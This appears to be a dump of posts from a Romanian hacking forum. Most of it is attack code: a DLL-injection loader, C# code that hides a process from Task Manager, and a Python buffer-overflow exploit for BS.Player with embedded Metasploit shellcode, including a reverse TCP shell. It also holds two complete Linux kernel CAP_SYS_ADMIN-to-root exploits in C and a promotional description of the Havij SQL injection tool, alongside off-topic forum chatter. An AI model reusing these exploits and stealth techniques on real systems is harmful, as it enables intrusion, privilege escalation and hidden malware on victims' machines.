///////////////////////////////////////////////////////////////// // R00TSECURITY.ORG - YOUR SECURITY COMMUNITY // - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - // [2009-10-03] Dll Injection Using SetWindowsHookEx() // r00tsecurity -> Source Code Center :: Dll Injection Using SetWindowsHookEx() // - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - // GENERATED ON: 2011-01-13 | 17:34:45 ///////////////////////////////////////////////////////////////// CODE INFO The SetWindowsHookEx method The SetWindowsHookEx method is a little bit more intrusive than the first, and creates more of a commotion in the injected process, which we normally don't want. However, it is a little bit easier to use than the first, and does have its own advantages (like being able to inject into every process on the system in one shot). The SetWindowsHookEx() function is designed to allow you to "hook" windows messages for a given thread. This requires that you inject a dll into that process's address space, so SetWindowsHookEx() handles all that for us. The dll must have a function for the hook that it created though, otherwise it will crash.
SOURCE CODE #define PROC_NAME \"target.exe\" #define DLL_NAME \"injected.dll\" void LoadDll(char *procName, char *dllName); unsigned long GetTargetThreadIdFromProcname(char *procName); int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow) { LoadDll(PROC_NAME, DLL_NAME); return 0; } void LoadDll(char *procName, char *dllName) { HMODULE hDll; unsigned long cbtProcAddr; hDll = LoadLibrary(dllName); cbtProcAddr = GetProcAddress(hDll, \"CBTProc\"); SetWindowsHookEx(WH_CBT, cbtProcAddr, hDll, GetTargetThreadIdFromProcName(procName)); return TRUE; } unsigned long GetTargetThreadIdFromProcname(char *procName) { PROCESSENTRY32 pe; HANDLE thSnapshot, hProcess; BOOL retval, ProcFound = false; unsigned long pTID, threadID; thSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(thSnapshot == INVALID_HANDLE_VALUE) { MessageBox(NULL, \"Error: unable to create toolhelp snapshot\", \"Loader\", NULL); return false; } pe.dwSize = sizeof(PROCESSENTRY32); retval = Process32First(thSnapshot, &pe); while(retval) { if(StrStrI(pe.szExeFile, procName) ) { ProcFound = true; break; } retval = Process32Next(thSnapshot,&pe); pe.dwSize = sizeof(PROCESSENTRY32); } CloseHandle(thSnapshot); _asm { mov eax, fs:[0x18] add eax, 36 mov [pTID], eax } hProcess = OpenProcess(PROCESS_VM_READ, false, pe.th32ProcessID); ReadProcessMemory(hProcess, (const void *)pTID, &threadID, 4, NULL); CloseHandle(hProcess); return threadID; } // r00tsecurity -> Source Code Center :: Dll Injection Using SetWindowsHookEx()
-
///////////////////////////////////////////////////////////////// // R00TSECURITY.ORG - YOUR SECURITY COMMUNITY // - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - // [2008-07-15] Hide from Taskmanager // r00tsecurity -> Source Code Center :: Hide from Taskmanager // - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - // GENERATED ON: 2011-01-13 | 17:31:42 ///////////////////////////////////////////////////////////////// CODE INFO This code is based off a source in vb6 I saw once. I ported it to C# and it works perfectly (after a few adjustements SOURCE CODE :::=== WINAPI.CS ===::: using System; using System.Collections.Generic; using System.Text; using System.Runtime.InteropServices; namespace WinApi { class User32 { public const Int32 WM_COMMAND = 273; public const Int32 MF_ENABLED = 0; public const Int32 MF_GRAYED = 1; public const Int32 LVM_FIRST = 4096; public const Int32 LVM_DELETEITEM = (LVM_FIRST + 8); public const Int32 LVM_SORTITEMS = (LVM_FIRST + 48); [DllImport("user32", EntryPoint = "FindWindowA", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)] public static extern Int32 FindWindow(string lpClassName, string lpWindowName); [DllImport("user32", EntryPoint = "FindWindowExA", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)] public static extern Int32 FindWindowEx(Int32 hWnd1, Int32 hWnd2, string lpsz1, string lpsz2); [DllImport("user32", EntryPoint = "EnableWindow", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)] public static extern bool EnableWindow(Int32 hwnd, Int32 fEnable); [DllImport("user32", EntryPoint = "GetMenu", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)] public static extern Int32 GetMenu(Int32 hwnd); [DllImport("user32", EntryPoint = "GetSubMenu", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)] public static extern Int32 GetSubMenu(Int32 hMenu, Int32 nPos); [DllImport("user32", EntryPoint = "GetMenuState", CharSet = 
CharSet.Ansi, SetLastError = true, ExactSpelling = true)] public static extern Int32 GetMenuState(Int32 hMenu, Int32 wID, Int32 wFlags); [DllImport("user32", EntryPoint = "GetMenuItemID", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)] public static extern Int32 GetMenuItemID(Int32 hMenu, Int32 nPos); [DllImport("user32", EntryPoint = "EnableMenuItem", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)] public static extern Int32 EnableMenuItem(Int32 hMenu, Int32 wIDEnableItem, Int32 wEnable); /*[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = false)] public static extern IntPtr SendMessage(IntPtr hWnd, uint Msg, IntPtr wParam, StringBuilder lParam);*/ [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = false)] public static extern IntPtr SendMessage(IntPtr hWnd, uint Msg, IntPtr wParam, String lParam); //Also can add 'ref' or 'out' ahead 'String lParam' // -- Do not use 'out String', use '[Out] StringBuilder' instead and initialize the string builder // with proper length first. Dunno why but that is the only thing that worked for me. 
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = false)] public static extern IntPtr SendMessage(IntPtr hWnd, uint Msg, IntPtr wParam, IntPtr lParam); [DllImport("user32", EntryPoint = "GetDesktopWindow", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)] public static extern Int32 GetDesktopWindow(); [DllImport("user32", EntryPoint = "LockWindowUpdate", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)] public static extern Int32 LockWindowUpdate(Int32 hwndLock); } } :::=== FORM1.CS ===::: using WinApi; System.Timers.Timer taskmanTimer = new System.Timers.Timer(700); #region Hide from taskmanager //Begin remove proccess from taskman timer private void removeFromTaskManager() { taskmanTimer.Elapsed += new System.Timers.ElapsedEventHandler(taskmanTimer_Elapsed); taskmanTimer.Enabled = true; } //Timer to remove procces from taskmanager void taskmanTimer_Elapsed(object sender, System.Timers.ElapsedEventArgs e) { Int32 lhWndParent = User32.FindWindow(null, "Windows Task Manager"); /////Define Handles////// Int32 lhWndDialog = 0; Int32 lhWndEndTaskButton = 0; Int32 lhWndEndProcessButton = 0; Int32 lhWndProcessList = 0; Int32 lhWndProcessHeader = 0; Int32 lhWndTaskList = 0; Int32 lhWndTaskHeader = 0; Int32 ProcessItemCount = 0; Int32 ProcessItemIndex = 0; Int32 TaskItemCount = 0; Int32 TaskItemIndex = 0; /////Get Menues///// //Get main menu Int32 hMenu = User32.GetMenu(lhWndParent); //Get View menu Int32 hViewMenu = User32.GetSubMenu(hMenu,2); //Get Update Speed Menu Int32 hUpdateSpeed = User32.GetSubMenu(hViewMenu, 1); //Get Refresh Now Button Int32 hRefreshNow = User32.GetMenuItemID(hViewMenu, 0); //Get High Int32 hHighRate = User32.GetMenuItemID(hUpdateSpeed, 0); //Get Normal Int32 hNormalRate = User32.GetMenuItemID(hUpdateSpeed, 1); //Get Low Int32 hLowRate = User32.GetMenuItemID(hUpdateSpeed, 2); //Get Paused Int32 hPausedRate = User32.GetMenuItemID(hUpdateSpeed, 3); for (int i = 1; i < 7; i++) { lhWndDialog = 
User32.FindWindowEx(lhWndParent, lhWndDialog, null, null); if(lhWndTaskList == 0) lhWndTaskList = User32.FindWindowEx(lhWndDialog, 0, "SysListView32", "Tasks"); if(lhWndTaskHeader == 0) lhWndTaskHeader = User32.FindWindowEx(lhWndTaskList, 0, "SysHeader32", null); if(lhWndEndTaskButton == 0) lhWndEndTaskButton = User32.FindWindowEx(lhWndDialog, lhWndTaskList, "Button", "&End Task"); if(lhWndProcessList == 0) lhWndProcessList = User32.FindWindowEx(lhWndDialog, 0, "SysListView32", "Processes"); if(lhWndProcessHeader == 0) lhWndProcessHeader = User32.FindWindowEx(lhWndProcessList, 0, "SysHeader32", null); if(lhWndEndProcessButton == 0) lhWndEndProcessButton = User32.FindWindowEx(lhWndDialog, lhWndProcessList, "Button", "&End Process"); } //Pause the update speed User32.SendMessage((IntPtr)lhWndParent, User32.WM_COMMAND, (IntPtr)hPausedRate, IntPtr.Zero); //User32.SendMessage((IntPtr)lhWndParent,(uint)User32.WM_COMMAND,(IntPtr)hPausedRate, /////Disable Menu Items////// User32.EnableMenuItem(hMenu,hRefreshNow,User32.MF_GRAYED); User32.EnableMenuItem(hMenu,hLowRate,User32.MF_GRAYED); User32.EnableMenuItem(hMenu,hNormalRate,User32.MF_GRAYED); User32.EnableMenuItem(hMenu,hHighRate,User32.MF_GRAYED); User32.EnableMenuItem(hHighRate, hPausedRate, User32.MF_GRAYED); User32.EnableWindow(lhWndProcessHeader, 0); User32.EnableWindow(lhWndTaskHeader, 0); Process[] Processes; Int32 z; string item; ListBox list = new ListBox(); list.Sorted = true; Processes = Process.GetProcesses(); foreach (Process p in Processes) { if (p.ProcessName.ToString() == "Idle") list.Items.Add("System Idle Process"); else list.Items.Add(p.ProcessName.ToString()); } ProcessItemCount = Processes.Length; ProcessItemCount--; string HideMe = Process.GetCurrentProcess().ProcessName; for (int x = 0; x != ProcessItemCount; x++) { item = list.Items[x].ToString(); if (item == HideMe) proccessIndex = x; } User32.LockWindowUpdate(lhWndProcessList); //refresh User32.SendMessage((IntPtr)lhWndParent, User32.WM_COMMAND, 
(IntPtr)hRefreshNow, IntPtr.Zero); //sort items User32.SendMessage((IntPtr)lhWndProcessList, User32.LVM_SORTITEMS, IntPtr.Zero,null); //Delete ourselves from the list >=D User32.SendMessage((IntPtr)lhWndProcessList, User32.LVM_DELETEITEM, (IntPtr)proccessIndex, IntPtr.Zero); User32.LockWindowUpdate(0); if (lhWndParent == 0) //taskmanager is closed refrsh every 800 miliseconds taskmanTimer.Interval = 800; else //taskmanager is open and paused. we don't have to refresh as fast taskmanTimer.Interval = 2500; } #endregion removeFromTaskManager(); // r00tsecurity -> Source Code Center :: Hide from Taskmanager
-
Am vazut si eu astea acum cateva zile, dar sunt obisnuit cu astfel de "persoane care se pricep la calculatoare", vedeam mult pe Hellshit. Cel putin, aici, la Offtopic-ul nostru cel de toate zilele nu isi etaleaza nimeni cunostintele incredibile in diverse domenii.
-
Nu se va inchide. Nu va place sectiunea, nu o vizitati. Apar multe lucruri interesante acolo, desigur, de multe ori nu au legatura cu IT-ul, dar tot sunt interesante. Nu pot fi numai discutii tehnice, si nici nu prea sunt, macar mai discutam cate ceva pe acolo. Nu asa se va scapa de posturile stupide si inutile.
-
Genul acela de tutoriale sunt pentru "Hacking in viata de zi cu zi" daca putem spune asta, si eu nu vad nimic rau in ele. Stai linistit, sunt destule tutoriale pe care le poti citi.
-
Bafta tuturor celor care incep sesiunea. E cineva la Informatica la Universitatea - Bucuresti? De maine ma apuc de invatat. Deci cred ca o sa dau mai rar pe aici, sa fiti cuminti.
-
Da, cred ca e necesara. Eu m-am trezit dimineata, am vazut-o facuta si m-am culcat la loc. Cand m-am trezit aveam impresia ca am visat RST, ca erau categorii noi...
-
Daca nu e putina disciplina nu se ajunge nicaieri. Problema e ca nimeni nu citeste regulile si in general nu sunt citite topicurile de la "Anunturi" unde se fac diverse precizari. Nu sterg topicuri, decat foarte rar, dar le mut, de cele mai multe ori la Ajutor sau la Cereri, unde le este locul. De ce cacat postati aici orice, cand acel orice are o categorie speciala destinata lui? Ex. http://rstcenter.com/forum/30130-help-download-podcast.rst Fusese postat la Offtopic, cand trebuia postat la Ajutor. Daca ar posta toti tot ce le trece prin cap aici ce ar iesi? Dar nu, trebuie sa dau eu warn-uri si sa stau sa mut topicuri pentru voi...
-
State of the Art Post Exploitation in Hardened PHP Environments Author: Stefan Esser Abstract In this paper we discuss the different protections an attacker faces in hardened PHP environments, after he succeeded in executing arbitrary PHP code. We introduce new techniques to overcome most of them by the use of local PHP exploits. We demonstrate how info leak and memory corruption vulnerabilities can be combined to enable PHP applications to read and write arbitrary memory. We will show step by step how important memory structures can be leaked and manipulated in order to deactivate or overcome protections. Download: http://www.exploit-db.com/download_pdf/15955 Mai tehnic decat articolele "clasice".
-
Advanced MySQL Exploitation Author: Muhaimin Dzulfakar Contents: 1 Abstract (p. 3); 2 Introduction (p. 3); 3 Stacked Query (p. 3); 4 Attacking MySQL on applications that do support stacked queries (p. 4); 5 Attacking MySQL on applications that do not support stacked queries (p. 5); 6 Fingerprinting the web server directory (p. 7); 6.1 Fingerprint through error message method (p. 7); 6.2 Fingerprint through LOAD_FILE method (p. 7); 7 Maximum size of arbitrary code allowed (p. 7); 8 Arbitrary file compression/decompression (p. 8); 9 Dealing with columns (p. 8); 10 Remote code execution on LAMP (p. 9); 11 Remote code execution on WAMP (p. 10); References (p. 11). Download: http://www.exploit-db.com/download_pdf/15956 Vedeti referintele.
-
Exploit Buffer Overfloe Bsplayer 2.57(UNICODE-SEH) Nu stiu daca merge, dar daca merge se pot face lucruri dragute cu el. # # #[+]Exploit Title: Exploit Buffer Overfloe Bsplayer 2.57(UNICODE-SEH) #[+]Date: 01\07\2010 #[+]Author: C4SS!0 G0M3S #[+]Software Link: http://www.bsplayer.com/services/downlad-free-bsplayer.php?type=2 #[+]Version: 2.57 #[+]Tested on: WIN-XP SP3 PORTUGUESE BRAZILIAN #[+]CVE: N/A # # # ######### ## ######### ######### ## ############### # ######### #### ######### ######### ## ## ## # ## ## ## ## ## ## ## ## # ## ## ## ## ## ## ## ## # ## ########## ######## ######## ## ## ## # ## ## ## ## ## ## ## # ## ## ## ## ## ## ## # ######## ## ######## ######### ## ## ## # ######## ## ######## ######### \/ ############### # #Created By C4SS!0 G0M3S #Louredo_@hotmail.com #www.invasao.com.br # # import os import sys import time import string os.system("cls") os.system("color 4f") def usage(): print "\n" print "[+]Exploit: Exploit Buffer Overflow Bsplayer(UNICODE-SEH)" print "[+]Date: 01\\07\\2010" print "[+]Author: C4SS!0 G0M3S" print "[+]Home: www.invasao.com.br" print "[+]E-mail: Louredo_@hotmail.com" print "[+]Version: 2.57" print "[+]Software: Bsplayer 2.57\n" print "[-]Note:" print "TO EXPLOIT THE RUN FILE NAME MUST BE FILE_NAME.M3U\n" if((len(sys.argv)!=3) or (int(sys.argv[1])<1) or (int(sys.argv[1])>2)): usage() print "Payloads:\n1 - WinExec(\"Calc.exe\",0)\n2 - Reverse_Tcp_Shell\n" print "[-]Usage: "+sys.argv[0]+" <Playload Number> <File Name>" print "[-]Exemple: "+sys.argv[0]+" 1 Exploit.m3u" sys.exit(0) usage() buffer = "\x42" * 4102 nseh = "\x61\x6d" seh = "\xde\x4e" #pop ebx - pop ebp - ret at 0x004E00DE [bsplayer.exe] egg_hunter = "\x45\x61\x45\x61\x45\x50\x45\xc3" junk = "\x45" * 1094 print "[*]Identifying the length Shellcode" time.sleep(1) if int(sys.argv[1]) == 2: shellcode = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZ" "ABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBNKWY7N4PV9X6PQX1PV9JYNZ9SDMTZTR" 
# "83SY0KT01RPLLLCBPLLT2RLPJX9KKTOX3NZUKKV0VLK3Y3MLRONMMJU2VWC8VQKQSOPTZT3CTK1LPUR6" # "KZR65RJC7NPWDLVRZQUMFMV85BXR7BOG8SCKUNXUVMVGIPMKJJZ6XSQ40ORI2UTOWNWRXVF679XJWYPL" #FROM METASPLOIT FRAMEWORK "OU2QOXQNN0GGLNM3HJLRVWUSKO4OWMVOZKXLKLY2B3U1BQMPEBVMQEEFULKP12N8GHWH43CROTS2NPPD" # "QT0YXLS5MOM3OCKSRWPFLJWWN19PSXXOFKYD7KLN3WYMFFEJY7LO785W6C1TM7MOURUH7EOM1FZTEMOJ" #SHELLCODE REVERSE_TCP_SHELL ON PORT 4444 "28TUN2LK0SKNTKKPHJSDRKLFONNC2620QXQTRFZUE3UGR8TOL5V3YO47PRSMMBURNNL9MNEHNELX5NOW" # "Q8C5UPOLK3BIRSQBOXVDD9STOI8LHBM1Y3PEPOKMQOMKRN8JZIJ3MPJ0VRRYY92VP0DLVJ3TVJFWKSKB" #PROMPT: "QCMXW7O30CRZRF7JK7JV4S2SRM9M5RRTOZZVFYQQDKKW1LY7S6LZFJLLZNXMJB685QOJGLNKNITOCZSK" # "QITVVPONFL6LN0O1RVBINM6OLML4XL0TNL6RRVN28UOKSULQJXYLLY9NLM57LVDS8NY2PMQ3MORRMHQD" #C:\>Telnet 127.0.0.1 4444 "BEINV9QY8U0MN1ZTUPPO3KGMVDOQWLNEUOJLWKE6UPNMBX12QURRNVJN78DYMXKOMHNA") # # if int(sys.argv[1]) == 1: shellcode = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZ" "ABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBIKY0NQ99GO3LLVRPHLXY2TMTL46QMNR" "8P1SHN853YXKLKSSHQXL4TENPSHWL3599RX6VNCJUKCH4VNSMM25ZOJP2MLWORBZMMM1DJ5QVO9MQ9W4" "V30ZUBQWZLFP5KELTXGCLKKMKLE2KZPNG9MOXKMNBNXMKVBK893KGOKSJXOPLPOMS8SR3UTPWKGHXOKT" "CDN4CMOQG1C34R171NSXML5WVKE7QSN4XL5VJZQM5W8O669OMOK90J9KN0Q31VVLNNOCUN957X7SHNOP" "YTP3KXWLE3O9XCKXJA") print "[*]The Length Shellcode:"+str(len(shellcode)) time.sleep(1) shellcode += "\x41" * 5000 file = str(sys.argv[2]) payload = buffer+nseh+seh+egg_hunter+junk+shellcode op = "w" print "[*]Creating Your File "+file time.sleep(1) try: f = open(file,op) f.write("http://"+payload) f.close() print "[*]The File "+file+" was Successfully Created" except: print "[*]Error Creating File "+file Sursa: BS.Player 2.57 Buffer Overflow Exploit (Unicode SEH)
-
Linux Kernel CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) Nu m-am uitat peste el, o sa vad care e treaba cand am putin timp liber. /* * Linux Kernel CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) * by Joe Sylve * @jtsylve on twitter * * Released: Jan 7, 2011 * * Based on the bug found by Dan Rosenberg (@djrbliss) * only loosly based on his exploit http://www.exploit-db.com/exploits/15916/ * * Usage: * gcc -w caps-to-root2.c -o caps-to-root2 * sudo setcap cap_sys_admin+ep caps-to-root2 * ./caps-to-root2 * * Kernel Version >= 2.6.34 (untested on earlier versions) * * Tested on Ubuntu 10.10 64-bit and Ubuntu 10.10 32-bit * * This exploit takes advantage of the same underflow as the original, * but takes a different approach. Instead of underflowing into userspace * (which doesn't work on 64-bit systems and is a lot of work), I underflow * to some static values inside of the kernel which are referenced as pointers * to userspace. This method is pretty simple and seems to be reliable. */ #include <stdio.h> #include <sys/socket.h> #include <errno.h> #include <string.h> #include <sys/mman.h> #include <unistd.h> // Skeleton Structures of the Kernel Structures we're going to spoof struct proto_ops_skel { int family; void *buffer1[8]; int (*ioctl)(void *, int, long); void *buffer2[12]; }; struct phonet_protocol_skel { void *ops; void *prot; int sock_type; }; #ifdef __x86_64__ #define SYM_NAME "local_port_range" #define SYM_ADDRESS 0x0000007f00000040 #define SYM_OFFSET 0x0 typedef int (* _commit_creds)(unsigned long cred); typedef unsigned long (* _prepare_kernel_cred)(unsigned long cred); #else //32-bit #define SYM_NAME "pn_proto" #define SYM_ADDRESS 0x4e4f4850 #define SYM_OFFSET 0x90 typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); #endif _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; int getroot(void * v, int i, long l) { 
commit_creds(prepare_kernel_cred(0)); return 0; } /* thanks spender... */ unsigned long get_kernel_sym(char *name) { FILE *f; unsigned long addr; char dummy; char sname[512]; int ret; char command[512]; sprintf(command, "grep \"%s\" /proc/kallsyms", name); f = popen(command, "r"); while(ret != EOF) { ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sname); if (ret == 0) { fscanf(f, "%s\n", sname); continue; } if (!strcmp(name, sname)) { fprintf(stdout, " [+] Resolved %s to %p\n", name, (void *)addr); pclose(f); return addr; } } pclose(f); return 0; } int main(int argc, char * argv[]) { int sock, proto; unsigned long proto_tab, low_kern_sym, pn_proto; void * map; /* Create a socket to load the module for symbol support */ printf("[*] Testing Phonet support and CAP_SYS_ADMIN...\n"); sock = socket(PF_PHONET, SOCK_DGRAM, 0); if(sock < 0) { if(errno == EPERM) printf("[*] You don't have CAP_SYS_ADMIN.\n"); else printf("[*] Failed to open Phonet socket.\n"); return -1; } close(sock); /* Resolve kernel symbols */ printf("[*] Resolving kernel symbols...\n"); proto_tab = get_kernel_sym("proto_tab"); low_kern_sym = get_kernel_sym(SYM_NAME) + SYM_OFFSET; pn_proto = get_kernel_sym("pn_proto"); commit_creds = (void *) get_kernel_sym("commit_creds"); prepare_kernel_cred = (void *) get_kernel_sym("prepare_kernel_cred"); if(!proto_tab || !commit_creds || !prepare_kernel_cred) { printf("[*] Failed to resolve kernel symbols.\n"); return -1; } if (low_kern_sym >= proto_tab) { printf("[*] %s is mapped higher than prototab. 
Can not underflow .\n", SYM_NAME); return -1; } /* Map it */ printf("[*] Preparing fake structures...\n"); const struct proto_ops_skel fake_proto_ops2 = { .family = AF_PHONET, .ioctl = &getroot, }; struct phonet_protocol_skel pps = { .ops = (void *) &fake_proto_ops2, .prot = (void *) pn_proto, .sock_type = SOCK_DGRAM, }; printf("[*] Copying Structures.\n"); map = mmap((void *) SYM_ADDRESS, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if(map == MAP_FAILED) { printf("[*] Failed to map landing area.\n"); perror("mmap"); return -1; } memcpy((void *) SYM_ADDRESS, &pps, sizeof(pps)); // Calculate Underflow proto = -((proto_tab - low_kern_sym) / sizeof(void *)); printf("[*] Underflowing with offset %d\n", proto); sock = socket(PF_PHONET, SOCK_DGRAM, proto); if(sock < 0) { printf("[*] Underflow failed .\n"); return -1; } printf("[*] Elevating privlidges...\n"); ioctl(sock, 0, NULL); if(getuid()) { printf("[*] Exploit failed to get root.\n"); return -1; } printf("[*] This was a triumph... I'm making a note here, huge success.\n"); execl("/bin/sh", "/bin/sh", NULL); close(sock); munmap(map, 0x1000); return 0; } Sursa: Linux Kernel CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit)
-
Linux Kernel CAP_SYS_ADMIN to root Exploit Nu m-am uitat inca peste el, cand am timp vad care e treaba. /* * Linux Kernel CAP_SYS_ADMIN to root exploit * by Dan Rosenberg * @djrbliss on twitter * * Usage: * gcc -w caps-to-root.c -o caps-to-root * sudo setcap cap_sys_admin+ep caps-to-root * ./caps-to-root * * This exploit is NOT stable: * * * It only works on 32-bit x86 machines * * * It only works on >= 2.6.34 kernels (it could probably be ported back, but * it involves winning a race condition) * * * It requires symbol support for symbols that aren't included by default in * several distributions * * * It requires the Phonet protocol, which may not be compiled on some * distributions * * * You may experience problems on multi-CPU systems * * It has been tested on a stock Ubuntu 10.10 installation. I wouldn't be * surprised if it doesn't work on other distributions. * * ---- * * Lately there's been a lot of talk about how a large subset of Linux * capabilities are equivalent to root. CAP_SYS_ADMIN is a catch-all * capability that, among other things, allows mounting filesystems and * injecting commands into an administrator's shell - in other words, it * trivially allows you to get root. However, I found another way to get root * from CAP_SYS_ADMIN...the hard way. * * This exploit leverages a signedness error in the Phonet protocol. By * specifying a negative protocol index, I can craft a series of fake * structures in userspace and cause the incrementing of an arbitrary kernel * address, which I then leverage to execute arbitrary kernel code. * * Greets to spender, cloud, jono, kees, pipacs, redpig, taviso, twiz, stealth, * and bla. 
* */ #include <stdio.h> #include <fcntl.h> #include <sys/socket.h> #include <errno.h> #include <string.h> #include <linux/capability.h> #include <sys/utsname.h> #include <sys/mman.h> #include <unistd.h> typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; int getroot(void) { commit_creds(prepare_kernel_cred(0)); return 0; } int konami(void) { /* Konami code! */ asm("inc %edx;" /* UP */ "inc %edx;" /* UP */ "dec %edx;" /* DOWN */ "dec %edx;" /* DOWN */ "shl %edx;" /* LEFT */ "shr %edx;" /* RIGHT */ "shl %edx;" /* LEFT */ "shr %edx;" /* RIGHT */ "push %ebx;" /* B */ "pop %ebx;" "push %eax;" /* A */ "pop %eax;" "mov $getroot, %ebx;" "call *%ebx;"); /* START */ return 0; } /* thanks spender... */ unsigned long get_kernel_sym(char *name) { FILE *f; unsigned long addr; char dummy; char sname[512]; struct utsname ver; int ret; int rep = 0; int oldstyle = 0; f = fopen("/proc/kallsyms", "r"); if (f == NULL) { f = fopen("/proc/ksyms", "r"); if (f == NULL) return 0; oldstyle = 1; } while(ret != EOF) { if (!oldstyle) ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname); else { ret = fscanf(f, "%p %s\n", (void **)&addr, sname); if (ret == 2) { char *p; if (strstr(sname, "_O/") || strstr(sname, "_S.")) continue; p = strrchr(sname, '_'); if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) { p = p - 4; while (p > (char *)sname && *(p - 1) == '_') p--; *p = '\0'; } } } if (ret == 0) { fscanf(f, "%s\n", sname); continue; } if (!strcmp(name, sname)) { fprintf(stdout, " [+] Resolved %s to %p\n", name, (void *)addr); fclose(f); return addr; } } fclose(f); return 0; } int main(int argc, char * argv[]) { int sock, proto, i, offset = -1; unsigned long proto_tab, landing, target, pn_ops, pn_ioctl, *ptr; void * map; /* Create a socket to load the module for symbol support */ printf("[*] 
Testing Phonet support and CAP_SYS_ADMIN...\n"); sock = socket(PF_PHONET, SOCK_DGRAM, 0); if(sock < 0) { if(errno == EPERM) printf("[*] You don't have CAP_SYS_ADMIN.\n"); else printf("[*] Failed to open Phonet socket.\n"); return -1; } /* Resolve kernel symbols */ printf("[*] Resolving kernel symbols...\n"); proto_tab = get_kernel_sym("proto_tab"); pn_ops = get_kernel_sym("phonet_dgram_ops"); pn_ioctl = get_kernel_sym("pn_socket_ioctl"); commit_creds = get_kernel_sym("commit_creds"); prepare_kernel_cred = get_kernel_sym("prepare_kernel_cred"); if(!proto_tab || !commit_creds || !prepare_kernel_cred || !pn_ops || !pn_ioctl) { printf("[*] Failed to resolve kernel symbols.\n"); return -1; } /* Thanks bla, for reminding me how to do basic math */ landing = 0x20000000; proto = 1 << 31 | (landing - proto_tab) >> 2; /* Map it */ printf("[*] Preparing fake structures...\n"); map = mmap((void *)landing, 0x10000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0); if(map == MAP_FAILED) { printf("[*] Failed to map landing area.\n"); return -1; } /* Pointer to phonet_protocol struct */ ptr = (unsigned long *)landing; ptr[0] = &ptr[1]; /* phonet_protocol struct */ for(i = 1; i < 4; i++) ptr[i] = &ptr[4]; /* proto struct */ for(i = 4; i < 204; i++) ptr[i] = &ptr[204]; /* First, do a test run to calculate any offsets */ target = 0x30000000; /* module struct */ for(i = 204; i < 404; i++) ptr[i] = target; /* Map it */ map = mmap((void *)0x30000000, 0x2000000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0); if(map == MAP_FAILED) { printf("[*] Failed to map landing area.\n"); return -1; } printf("[*] Calculating offsets...\n"); socket(PF_PHONET, SOCK_DGRAM, proto); ptr = 0x30000000; for(i = 0; i < 0x800000; i++) { if(ptr[i] != 0) { offset = i * sizeof(void *); break; } } if(offset == -1) { printf("[*] Test run failed.\n"); return -1; } /* MSB of pn_ioctl */ target = pn_ops + 10 * sizeof(void *) - 1 - offset; /* 
Re-fill the module struct */ ptr = (unsigned long *)landing; for(i = 204; i < 404; i++) ptr[i] = target; /* Push pn_ioctl fptr into userspace */ printf("[*] Modifying function pointer...\n"); landing = pn_ioctl; while((landing & 0xff000000) != 0x10000000) { socket(PF_PHONET, SOCK_DGRAM, proto); landing += 0x01000000; } /* Map it */ map = mmap((void *)(landing & ~0xfff), 0x10000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0); if(map == MAP_FAILED) { printf("[*] Failed to map payload area.\n"); return -1; } /* Copy payload */ memcpy((void *)landing, &konami, 1024); printf("[*] Executing Konami code at ring0...\n"); ioctl(sock, 0, NULL); if(getuid()) { printf("[*] Exploit failed to get root.\n"); return -1; } printf("[*] Konami code worked! Have a root shell.\n"); execl("/bin/sh", "/bin/sh", NULL); } Sursa: Linux Kernel CAP_SYS_ADMIN to root Exploit
-
Havij v1.14 Advanced SQL Injection Jan 08, 2011 Description: Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. By using this software the user can perform back-end database fingerprinting, retrieve DBMS users and password hashes, dump tables and columns, fetch data from the database, run SQL statements and even access the underlying file system and execute commands on the operating system. What makes Havij different from similar tools is its injection methods. The success rate is more than 95% when injecting vulnerable targets using Havij. The user-friendly GUI (Graphical User Interface) of Havij and its automated settings and detections make it easy to use for everyone, even amateur users. What's New? * Sybase (ASE) database added. * Sybase (ASE) Blind database added. * Time based method for 